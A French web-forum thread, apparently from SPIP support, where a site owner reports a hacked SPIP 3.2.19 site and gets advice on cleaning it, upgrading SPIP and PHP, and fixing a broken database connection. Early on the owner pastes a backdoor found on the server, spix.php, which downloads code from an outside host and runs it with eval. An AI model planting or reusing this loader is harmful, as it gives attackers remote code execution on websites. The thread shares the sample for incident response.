Bonjour, je n’arrive pas à trouver d’où cela peut bien venir.
Une ligne de code avait était rajoutée en haut de inc_version.php sous « ecrire » . Je l’ai effacé hier mais j’ai toujours ce problème.
Jluc
Une ligne de code avait était rajoutée en haut de inc_version.php sous « ecrire » . Je l’ai effacé hier mais j’ai toujours ce problème.
Jluc
Je viens de trouver un fichier spix.php à la racine du site avec ces lignes de code :
<?php $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://blackboys.pages.dev/cgi/hitam.txt"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'); curl_setopt($ch, CURLOPT_HTTPHEADER, [ 'Accept: text/html', 'Accept-Language: en-US,en;q=0.9' ]); $output = curl_exec($ch); curl_close($ch); if ($output && is_string($output)) { eval("?>".$output);} else {
error_log("æâ€Â¶Ã¥Ë†Â°Ã¦â€” 效或ä¸Â安全的内容。");
}
?>
Bonjour,
Le site est hacké donc le mettre à jour serait bien déjà.
En suivant cette doc par exemple après avoir regarde les plugins utiliser Changer la version majeure de SPIP - SPIP
Merci. Je suis en spip 3.2.19
Oui qui n’est plus maintenu Versions maintenues - SPIP
Il va donc falloir :
- passer en PHP 7.4
- passer en SPIP 4.4.6
Le tout en nettoyant le site de tous les fichiers vérolés.
(c’est plus sûr de tout déplacer dans un sous dossier, de nettoyer le dossier IMG/ et squelettes/, d’installer SPIP 4.4.6 à la racine, de remettre IMG/ et squelettes/ à la racine, et de réinstaller les plugins du site 1 par 1 via l’outil de gestion des plugins de SPIP, et de ne pas oublier le htaccess.txt à renommer à .htaccess et à recustomiser si nécessaire)
Bonjour,
c’est quand même la première fois que j’entends dire que le v3.19 est hacké 
Clt
Le hack était peut-être déjà présent avant la maj en 3.2.19 
Parfois c’est plus simple de changer d’hébergement que de se débarrasser d’une intrusion… et bien entendu passer à un SPIP maintenu.
SPIP 3 n’est plus maintenu et doit être considéré comme autant troué que la fiscalité des milliardaires.
2 « J'aime »
Non, je ne pense pas. Je pense que cela date d’il y a au plus 2 mois.
Bah, disons que c’est visible depuis deux mois… Mais peut-être il y avait des fichiers « dormants » cachés suite à un hack précédent. (il y a eu plusieurs cas comme ça).
En tout cas il n’y a pas de faille connue sur la 3.2.19… mais elle n’est pas maintenue et donc potentiellement trouée…
Il faut nettoyer et mettre à jour.
Bon, j’a voulu muter vers le 4.0 et le php de 7.3 à 7.4. En fait j’ai charger le 4.4 sans m’en apercevoir. Et je n’arrive pas à faire évoluer la base de donnée… Je ne vois que la page d’accueil et sa plante sur tout le reste. Bref…
Ça plante comment ?
De ce que j’en vois, c’est un problème de connexion à la base de données.
Le config/connect.php a été écrasé ?
En fait, j’ai depuis réinstallé la version 3.2.19. Après avoir tenté la 4.4. . Je suis passé de php 7.3 à 7.4. J’ai mis le conncet.php qui correspond.
Je n’arrive pas à faire apparaître dans mon interface privé les « plugins » sauf le dist. Plusieurs choses n’apparaissent pas dans cette interface privée. Il est pauvre.
Il ne voit pas non plus mon fichier dump avec une sauvegarde de la base. Je récupère des sauvegardes sur mon compte ovh où je suis hébergé.
Pendant que j’ai les mains dans le cambouis j’ai mis une page index.html.
Il y a quelque chose qui m’échappe. Une histoire de droit quelque part ?
Sans doute des droits sur les fichiers.
Si tu veux, retrouves-moi sur le discord de SPIP dans le salon audio d’entreaide.
Et, avec un partage d’écran, je peux essayer de te décoincer.
Merci, mais je n’ai pas de micro sur mon ordi de bureau…
Je suis allé sur phpmyadmin voir ma base. Il ne semble pas manquer de table. Pourtant…
Un exemple dans l’interface privé sur une rubrique qui a 60 articles :
Bref…
Quand je lance la tentative de réparation, tout paraît normal…
Est-ce que par hasard, les tables sont préfixées dans leur nom par autre chose que spip_ ?
Mais sur ton téléphone ? On peut être au téléphone pour le son, et en visio pour le partage d’écran.